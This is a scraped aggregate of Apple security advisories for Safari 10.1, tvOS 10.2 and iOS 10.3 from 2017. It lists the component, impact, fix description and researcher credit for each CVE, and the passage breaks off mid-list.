CVE-2017-2392: Max Bazaliy of Lookout



Entry added March 30, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2457: lokihardt of Google Project Zero



Entry added March 30, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed with improved memory handling.



CVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



Entry added August 23, 2017



**WebKit JavaScript Bindings**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2442: lokihardt of Google Project Zero



**WebKit Web Inspector**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Closing a window while paused in the debugger may lead to unexpected application termination



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2377: Vicki Pfau



**WebKit Web Inspector**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2405: Apple



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## Additional recognition



**Safari**



We would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.



**Webkit**



We would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.

", "edition": 1, "modified": "2017-08-29T02:51:42", "published": "2017-08-29T02:51:42", "id": "APPLE:HT207600", "href": "https://support.apple.com/kb/HT207600", "title": "About the security content of Safari 10.1 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T18:08:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "description": "## About Apple security updates



For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.



For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).



Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## tvOS 10.2



Released March 27, 2017



**Audio**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative



CVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative



**Carbon**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution



Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.



CVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**CoreGraphics**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted image may lead to a denial of service



Description: An infinite recursion was addressed through improved state management.



CVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**CoreGraphics**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2444: Mei Wang of 360 GearTeam



**CoreText**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted font file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2435: John Villamil, Doyensec



**CoreText**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted font may result in the disclosure of process memory



Description: An out-of-bounds read was addressed through improved input validation.



CVE-2017-2450: John Villamil, Doyensec



**CoreText**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted text message may lead to application denial of service



Description: A resource exhaustion issue was addressed through improved input validation.



CVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI



**FontParser**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted font file may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



CVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**FontParser**



Available for: Apple TV (4th generation)



Impact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**FontParser**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted font may result in the disclosure of process memory



Description: An out-of-bounds read was addressed through improved input validation.



CVE-2017-2439: John Villamil, Doyensec



**HTTPProtocol**



Available for: Apple TV (4th generation)



Impact: A malicious HTTP/2 server may be able to cause undefined behavior



Description: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.



CVE-2017-2428



Entry updated March 28, 2017



**ImageIO**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted image may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent



**ImageIO**



Available for: Apple TV (4th generation)



Impact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative



**ImageIO**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2467



**ImageIO**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted image may lead to unexpected application termination



Description: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.



CVE-2016-3619



**JavaScriptCore**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2491: Apple



Entry added May 2, 2017



**JavaScriptCore**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted web page may lead to universal cross site scripting



Description: A prototype issue was addressed through improved logic.



CVE-2017-2492: lokihardt of Google Project Zero



Entry updated April 24, 2017



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: An integer overflow was addressed through improved input validation.



CVE-2017-2440: an anonymous researcher



**Kernel**



Available for: Apple TV (4th generation)



Impact: A malicious application may be able to execute arbitrary code with root privileges



Description: A race condition was addressed through improved memory handling.



CVE-2017-2456: lokihardt of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2472: Ian Beer of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: A malicious application may be able to execute arbitrary code with kernel privileges



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2473: Ian Beer of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: An off-by-one issue was addressed through improved bounds checking.



CVE-2017-2474: Ian Beer of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A race condition was addressed through improved locking.



CVE-2017-2478: Ian Beer of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A buffer overflow issue was addressed through improved memory handling.



CVE-2017-2482: Ian Beer of Google Project Zero



CVE-2017-2483: Ian Beer of Google Project Zero



**Kernel**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with elevated privileges



Description: A memory corruption issue was addressed through improved memory handling.



CVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)



Entry added March 31, 2017



**Keyboards**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code



Description: A buffer overflow was addressed through improved bounds checking.



CVE-2017-2458: Shashank (@cyberboyIndia)



**Keychain**



Available for: Apple TV (4th generation)



Impact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.



Description: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.



CVE-2017-2448: Alex Radocea of Longterm Security, Inc.



Entry updated March 30, 2017



**libarchive**



Available for: Apple TV (4th generation)



Impact: A local attacker may be able to change file system permissions on arbitrary directories



Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.



CVE-2017-2390: Omer Medan of enSilo Ltd



**libc++abi**



Available for: Apple TV (4th generation)



Impact: Demangling a malicious C++ application may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2441



**libxslt**



Available for: Apple TV (4th generation)



Impact: Multiple vulnerabilities in libxslt



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-5029: Holger Fuhrmannek



Entry added March 28, 2017



**Security**



Available for: Apple TV (4th generation)



Impact: An application may be able to execute arbitrary code with root privileges



Description: A buffer overflow was addressed through improved bounds checking.



CVE-2017-2451: Alex Radocea of Longterm Security, Inc.



**Security**



Available for: Apple TV (4th generation)



Impact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution



Description: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.



CVE-2017-2485: Aleksandar Nikolic of Cisco Talos



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A prototype access issue was addressed through improved exception handling.



CVE-2017-2386: Andr\u00e9 Bargull



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2394: Apple



CVE-2017-2396: Apple



CVE-2016-9642: Gustavo Grieco



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2395: Apple



CVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative



CVE-2017-2455: Ivan Fratric of Google Project Zero



CVE-2017-2459: Ivan Fratric of Google Project Zero



CVE-2017-2460: Ivan Fratric of Google Project Zero



CVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin



CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab



CVE-2017-2466: Ivan Fratric of Google Project Zero



CVE-2017-2468: lokihardt of Google Project Zero



CVE-2017-2469: lokihardt of Google Project Zero



CVE-2017-2470: lokihardt of Google Project Zero



CVE-2017-2476: Ivan Fratric of Google Project Zero



CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative



Entry updated June 20, 2017



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A type confusion issue was addressed through improved memory handling.



CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to high memory consumption



Description: An uncontrolled resource consumption issue was addressed through improved regex processing.



CVE-2016-9643: Gustavo Grieco



**WebKit**



Available for: Apple TV (4th generation)



Impact: A malicious website may exfiltrate data cross-origin



Description: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2367: lokihardt of Google Project Zero



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.



CVE-2017-2445: lokihardt of Google Project Zero



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.



CVE-2017-2446: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: Apple TV (4th generation)



Impact: Visiting a maliciously crafted website may compromise user information



Description: A memory corruption issue was addressed through improved memory handling.



CVE-2017-2447: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



Entry added March 28, 2017



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in frame handling. This issue was addressed through improved state management.



CVE-2017-2475: lokihardt of Google Project Zero



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2479: lokihardt of Google Project Zero



Entry added March 28, 2017



**WebKit**



Available for: Apple TV (4th generation)



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2480: lokihardt of Google Project Zero



CVE-2017-2493: lokihardt of Google Project Zero



Entry updated April 24, 2017



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## Additional recognition



**XNU**



We would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.

", "edition": 1, "modified": "2017-06-20T10:43:59", "published": "2017-06-20T10:43:59", "id": "APPLE:HT207601", "href": "https://support.apple.com/kb/HT207601", "title": "About the security content of tvOS 10.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T18:05:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "description": "## About Apple security updates



For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.



For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).



Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## iOS 10.3



Released March 27, 2017



**Accounts**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A user may be able to view an Apple ID from the lock screen



Description: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.



CVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher



**Audio**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative



CVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative



**Carbon**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution



Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.



CVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**CoreGraphics**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted image may lead to a denial of service



Description: An infinite recursion was addressed through improved state management.



CVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**CoreGraphics**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2444: Mei Wang of 360 GearTeam



**CoreText**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted font file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2435: John Villamil, Doyensec



**CoreText**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted font may result in the disclosure of process memory



Description: An out-of-bounds read was addressed through improved input validation.



CVE-2017-2450: John Villamil, Doyensec



**CoreText**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted text message may lead to application denial of service



Description: A resource exhaustion issue was addressed through improved input validation.



CVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher



**DataAccess**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server



Description: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.



CVE-2017-2414: Ilya Nesterov and Maxim Goncharov



**FontParser**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted font file may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



CVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**FontParser**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department



**FontParser**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted font may result in the disclosure of process memory



Description: An out-of-bounds read was addressed through improved input validation.



CVE-2017-2439: John Villamil, Doyensec



**HomeKit**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Home Control may unexpectedly appear on Control Center



Description: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.



CVE-2017-2434: Suyash Narain of India



**HTTPProtocol**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A malicious HTTP/2 server may be able to cause undefined behavior



Description: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.



CVE-2017-2428



Entry updated March 28, 2017



**ImageIO**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted image may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent



**ImageIO**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative



**ImageIO**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2467



**ImageIO**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted image may lead to unexpected application termination



Description: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.



CVE-2016-3619



**iTunes Store**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An attacker in a privileged network position may be able to tamper with iTunes network traffic



Description: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.



CVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)



**JavaScriptCore**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2491: Apple



Entry added May 2, 2017



**JavaScriptCore**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Processing a maliciously crafted web page may lead to universal cross site scripting



Description: A prototype issue was addressed through improved logic.



CVE-2017-2492: lokihardt of Google Project Zero



Entry updated April 24, 2017



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team



CVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: An integer overflow was addressed through improved input validation.



CVE-2017-2440: an anonymous researcher



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A malicious application may be able to execute arbitrary code with root privileges



Description: A race condition was addressed through improved memory handling.



CVE-2017-2456: lokihardt of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2472: Ian Beer of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A malicious application may be able to execute arbitrary code with kernel privileges



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2473: Ian Beer of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: An off-by-one issue was addressed through improved bounds checking.



CVE-2017-2474: Ian Beer of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A race condition was addressed through improved locking.



CVE-2017-2478: Ian Beer of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with kernel privileges



Description: A buffer overflow issue was addressed through improved memory handling.



CVE-2017-2482: Ian Beer of Google Project Zero



CVE-2017-2483: Ian Beer of Google Project Zero



**Kernel**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code with elevated privileges



Description: A memory corruption issue was addressed through improved memory handling.



CVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)



Entry added March 31, 2017



**Keyboards**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An application may be able to execute arbitrary code



Description: A buffer overflow was addressed through improved bounds checking.



CVE-2017-2458: Shashank (@cyberboyIndia)



**Keychain**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.



Description: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.



CVE-2017-2448: Alex Radocea of Longterm Security, Inc.



Entry updated March 30, 2017



**libarchive**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A local attacker may be able to change file system permissions on arbitrary directories



Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.



CVE-2017-2390: Omer Medan of enSilo Ltd



**libc++abi**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Demangling a malicious C++ application may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2441



**libxslt**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Multiple vulnerabilities in libxslt



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-5029: Holger Fuhrmannek



Entry added March 28, 2017



**Pasteboard**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A person with physical access to an iOS device may read the pasteboard



Description: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.



CVE-2017-2399



**Phone**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A third party app can initiate a phone call without user interaction



Description: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.



CVE-2017-2484



**Profiles**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm



Description: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.



CVE-2017-2380: an anonymous researcher



**Quick Look**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Tapping a tel link in a PDF document could trigger a call without prompting the user



Description: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.



CVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring



**Safari**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: Visiting a malicious website may lead to address bar spoofing



Description: A state management issue was addressed by disabling text input until the destination page loads.



CVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)



**Safari**



Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later



Impact: A local user may be able to discover websites a user has visited in Private Browsing



